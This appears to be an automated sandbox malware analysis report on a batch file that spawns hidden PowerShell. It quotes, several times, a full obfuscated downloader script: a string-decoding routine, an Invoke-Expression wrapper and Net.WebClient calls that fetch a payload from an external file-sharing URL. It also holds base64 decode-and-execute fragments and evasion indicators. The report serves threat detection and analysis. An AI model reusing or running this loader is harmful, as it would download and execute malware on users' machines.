Source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal84.troj.evad.winCMD@7/6@3/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Tchick.Ite
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tc2pmvdp.lku.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. 
H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. 
H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Qib.pdb[ source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD96000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdbL source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match File source: 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Zannes)$global:Pussley = [System.Text.Encoding]::ASCII.GetString($Professionel)$global:Papirarkiv61=$Pussley.substring($Sanitetsvsenernes,$Rehaul)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. 
H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F37687 push esp; retf 2_2_00007FF848F37688
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F3707B pushad ; retf 2_2_00007FF848F37089
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F300BD pushad ; iretd 2_2_00007FF848F300C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF8490071C5 push edi; retf 2_2_00007FF8490071C6
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4274
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5625
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608 Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
        Source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match File source: amsi64_5256.amsi.csv, type: OTHER
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. 
H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
